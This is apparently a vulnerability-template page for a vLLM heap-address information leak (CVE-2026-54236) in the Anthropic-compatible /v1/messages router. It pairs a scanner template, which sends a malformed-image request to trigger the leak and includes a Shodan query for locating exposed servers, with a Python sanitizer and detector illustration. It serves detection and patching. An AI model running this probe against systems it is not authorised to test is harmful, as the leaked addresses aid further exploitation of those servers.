
vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak

CVE-2026-54236
Early Release

Description

vLLM <= 0.23.0 carries an incomplete fix for CVE-2026-22778. The original fix added sanitize_message to the OpenAI-compatible router, but the Anthropic-compatible router (/v1/messages) still copies str(exc) verbatim into its error response, so a Python object repr such as "<_io.BytesIO object at 0x...>" (and the heap address it contains) reaches the client.
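As an added illustration (this is not vLLM's code and not part of the advisory or the template), the Python sketch below shows the pattern the description refers to: an error path that copies str(exc) into an Anthropic-style error envelope, a hypothetical sanitize_message that strips Python object reprs before the message leaves the server, and a defender-side check over a response body that looks for the same "object at 0x" signature the template's matcher keys on. The function names, the error envelope layout and the sample exception are assumptions constructed for this example.

```python
import io
import json
import re

# A Python object repr carrying a memory address, e.g.
# "<_io.BytesIO object at 0x7f3a1c2d4e50>". This is the shape of the
# string the advisory says is echoed to the client.
OBJECT_REPR_RE = re.compile(r"<[\w.]+ object at 0x[0-9a-fA-F]+>")


def simulate_bad_image_decode() -> Exception:
    """Constructed stand-in for the failure the template provokes: an image
    decoder that includes the BytesIO it was handed in its error text.
    Not vLLM's decoder; only the resulting message shape matters here."""
    buf = io.BytesIO(b"notanimage")
    return ValueError(f"cannot identify image file {buf!r}")


def vulnerable_error_body(exc: Exception) -> dict:
    """Vulnerable pattern from the description: str(exc) copied unchanged
    into the error envelope (envelope layout is an assumption)."""
    return {
        "type": "error",
        "error": {"type": "internal_error", "message": str(exc)},
    }


def sanitize_message(message: str) -> str:
    """Hypothetical sanitizer: it shares the name the advisory mentions, but
    this implementation is an assumption. It replaces object reprs so the
    heap address never reaches the client while the rest of the message,
    which may still be useful to the caller, is preserved."""
    return OBJECT_REPR_RE.sub("<object>", message)


def hardened_error_body(exc: Exception) -> dict:
    """Same envelope, but the message passes through sanitize_message."""
    return {
        "type": "error",
        "error": {"type": "internal_error", "message": sanitize_message(str(exc))},
    }


def render(body: dict) -> str:
    """Serialize the envelope the way a JSON API response would carry it."""
    return json.dumps(body)


def leaks_heap_address(response_body: str) -> bool:
    """Defender-side check mirroring the template's matcher: does a response
    body contain a Python object repr with a 0x address? Usable over
    captured responses or proxy logs to confirm whether a deployment still
    leaks after patching."""
    return OBJECT_REPR_RE.search(response_body) is not None


if __name__ == "__main__":
    exc = simulate_bad_image_decode()
    for label, body in (("vulnerable", vulnerable_error_body(exc)),
                        ("hardened", hardened_error_body(exc))):
        text = render(body)
        print(f"{label}: leaks={leaks_heap_address(text)} body={text}")
```

The sanitizer deliberately rewrites only the repr fragment rather than replacing the whole message, which keeps operator-facing diagnostics readable; a stricter deployment can instead log the full str(exc) server-side and return a fixed generic message to the client.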

Severity

Medium

CVSS Score

5.3

Affected Product

vllm

Published Date

June 21, 2026

Template Author

kenlacroix

CVE-2026-54236.yaml
id: CVE-2026-54236

info:
  name: vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak
  author: kenlacroix
  severity: medium
  description: |
    vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added sanitize_message to the OpenAI router but the Anthropic-compatible router (/v1/messages) echoes str(exc) directly.
  impact: |
    Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution.
  remediation: |
    Update to vllm version to latest.
  reference:
    - https://github.com/advisories/GHSA-hgg8-fqqc-vfmw
    - https://github.com/vllm-project/vllm/pull/45119
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-54236
    cwe-id: CWE-532
  metadata:
    verified: true
    max-request: 2
    vendor: vllm
    product: vllm
    shodan-query: http.html:"/v1/models" http.html:"vllm"
    tags: cve,cve2026,vllm,llm,ai,info-leak,anthropic,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /v1/models HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"id\":")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: model
        part: body
        internal: true
        group: 1
        regex:
          - '"id"\s*:\s*"([^"]+)"'

  - raw:
      - |
        POST /v1/messages HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"model":"{{model}}","max_tokens":1,"messages":[{"role":"user","content":[{"type":"text","text":"{{randstr}}"},{"type":"image","source":{"type":"base64","media_type":"image/png","data":"bm90YW5pbWFnZQ=="}}]}]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, "_io.BytesIO object at 0x", "internal_error")'
        condition: and
# digest: 490a0046304402203d0401405f93372d5011d6a2e2287cccbbe6242f4f1d378ed42d94691ce5e7a902201d1533f274ca8d484c5904ad4db2f54606c8a9db242dff92fc695a32d54d4dae:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID: CVE-2026-54236
CWE ID: CWE-532

References

https://github.com/advisories/GHSA-hgg8-fqqc-vfmw
https://github.com/vllm-project/vllm/pull/45119

Remediation Steps

Update vllm to the latest version.